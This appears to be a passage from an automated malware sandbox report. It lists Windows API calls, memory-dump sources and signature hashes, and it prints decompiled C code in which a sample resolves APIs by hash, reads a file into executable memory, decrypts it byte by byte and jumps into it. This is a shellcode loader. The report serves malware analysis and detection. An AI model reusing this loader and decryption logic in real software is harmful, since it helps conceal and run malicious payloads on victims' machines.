                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 027405D3
                              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 027408ED
                              Memory Dump Source
                              • Source File: 0000001E.00000002.2346425073.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                              Similarity
                              • API ID: Process$CreateMemoryReadTerminate
                              • String ID:
                              • API String ID: 2831168122-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Executed Functions

                              APIs
                              • VirtualAlloc.KERNEL32(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 003F1739
                              • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 003F179B
                              Strings
                              Memory Dump Source
                              • Source File: 00000020.00000002.2360250189.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                              Similarity
                              • API ID: AllocCreateFileVirtual
                              • String ID: 5cd4190b0f424c1ba550357b44f5a494
                              • API String ID: 1475775534-4174767169
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 003F0A20
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 003F0BED
                              Memory Dump Source
                              • Source File: 00000020.00000002.2360250189.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessW.KERNEL32(?,00000000), ref: 003F058C
                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 003F05D3
                              • TerminateProcess.KERNEL32(00000000,00000000,?), ref: 003F08ED
                              Memory Dump Source
                              • Source File: 00000020.00000002.2360250189.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                              Similarity
                              • API ID: Process$CreateMemoryReadTerminate
                              • String ID:
                              • API String ID: 2831168122-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Executed Functions

                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 01D60A20
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 01D60BED
                              Memory Dump Source
                              • Source File: 00000022.00000002.2367702072.0000000001D60000.00000040.00000001.sdmp, Offset: 01D60000, based on PE: false
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 01D61739
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01D6179B
                              Strings
                              Memory Dump Source
                              • Source File: 00000022.00000002.2367702072.0000000001D60000.00000040.00000001.sdmp, Offset: 01D60000, based on PE: false
                              Similarity
                              • API ID: AllocCreateFileVirtual
                              • String ID: 5cd4190b0f424c1ba550357b44f5a494
                              • API String ID: 1475775534-4174767169
                              • Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
                              • Instruction ID: 17ef0d56088fd3324df17fdeb9428d5d64948022ec8e35e64631543cfb36deef
                              • Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
                              • Instruction Fuzzy Hash: 4CE15C21D44398EEEF21CBE4DC15BEDBBB9AF44710F10409AE648FA1E1D7B50A84DB25
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 62%
                              			E10001120(void* __eflags) {
                              				signed int _v8;
                              				short _v528;
                              				signed int _v529;
                              				signed int _v536;
                              				intOrPtr _v540;
                              				void* _v544;
                              				long _v548;
                              				void* _v552;
                              				long _v556;
                              				intOrPtr _v560;
                              				intOrPtr _v564;
                              				intOrPtr _v568;
                              				intOrPtr _v572;
                              				intOrPtr _v576;
                              				intOrPtr _v580;
                              				signed int _t156;
                              
                              				_v8 =  *0x10003028 ^ _t156;
                              				_v536 = 0;
                              				_v556 = 0;
                              				_v540 = E10001000();
                              				_v568 = E10001070(_v540, 0x8a111d91);
                              				_v560 = E10001070(_v540, 0xcbec1a0);
                              				_v564 = E10001070(_v540, 0xa4f84a9a);
                              				_v572 = E10001070(_v540, 0x170c1ca1);
                              				_v580 = E10001070(_v540, 0x433a3842);
                              				_v576 = E10001070(_v540, 0xa5f15738);
                              				_v560(0x103,  &_v528);
                              				_v564( &_v528, 0x10003000);
                              				_v552 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0);
                              				_v548 = _v572(_v552, 0);
                              				_v544 = VirtualAlloc(0, _v548, 0x3000, 0x40);
                              				ReadFile(_v552, _v544, _v548,  &_v556, 0);
                              				_v536 = 0;
                              				while(_v536 < _v556) {
                              					_v529 =  *((intOrPtr*)(_v544 + _v536));
                              					_v529 =  !(_v529 & 0x000000ff);
                              					_v529 = (_v529 & 0x000000ff) + _v536;
                              					_v529 = (_v529 & 0x000000ff) >> 0x00000006 | (_v529 & 0x000000ff) << 0x00000002;
                              					_v529 = _v529 & 0x000000ff ^ _v536;
                              					_v529 =  !(_v529 & 0x000000ff);
                              					_v529 = (_v529 & 0x000000ff) + _v536;
                              					_v529 =  !(_v529 & 0x000000ff);
                              					_v529 = (_v529 & 0x000000ff) + _v536;
                              					_v529 =  ~(_v529 & 0x000000ff);
                              					_v529 = (_v529 & 0x000000ff) - 0x6a;
                              					_v529 =  !(_v529 & 0x000000ff);
                              					_v529 = (_v529 & 0x000000ff) - _v536;
                              					_v529 = (_v529 & 0x000000ff) >> 0x00000007 | (_v529 & 0x000000ff) << 0x00000001;
                              					 *((char*)(_v544 + _v536)) = _v529;
                              					_v536 = _v536 + 1;
                              				}
                              				_v544();
                              				return E10001469(_v8 ^ _t156);
                              			}




















                              APIs
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1000122B
                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 1000125C
                              • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 10001286
                              Memory Dump Source
                              • Source File: 00000022.00000002.2369128015.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                              • Associated: 00000022.00000002.2369119854.0000000010000000.00000002.00020000.sdmp
                              • Associated: 00000022.00000002.2369135188.0000000010002000.00000002.00020000.sdmp
                              • Associated: 00000022.00000002.2369142260.0000000010004000.00000002.00020000.sdmp
                              Similarity
                              • API ID: File$AllocCreateReadVirtual
                              • String ID:
                              • API String ID: 3585551309-0
                              • Opcode ID: 86540e53140d6a27daeaf18af5c0d53a382bff5c58e8775cad50aa62538d58c9
                              • Instruction ID: 83d81e531b48bbb665f37a7df122501d88c9d55b6a80c66f86e06f7556a42c30
                              • Opcode Fuzzy Hash: 86540e53140d6a27daeaf18af5c0d53a382bff5c58e8775cad50aa62538d58c9
                              • Instruction Fuzzy Hash: 03715174C462BC9ADB21CBA49C9CBECBFB09F5A201F0481C9E59C66286C6345FC4CF61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessW.KERNEL32(?,00000000), ref: 01D6058C
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01D605D3
                              Memory Dump Source
                              • Source File: 00000022.00000002.2367702072.0000000001D60000.00000040.00000001.sdmp, Offset: 01D60000, based on PE: false
                              Similarity
                              • API ID: Process$CreateMemoryRead
                              • String ID:
                              • API String ID: 2726527582-0
                              • Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
                              • Instruction ID: 94f7c7d692c340dd9f84a6c4bb6634b6a7d115267d36dbe4c441c288cd57d9a5
                              • Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
                              • Instruction Fuzzy Hash: DF523B35E50258AFEB60CBA8EC55BFDB7B5AF48700F204496E608FA2A0D3745E80DF55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions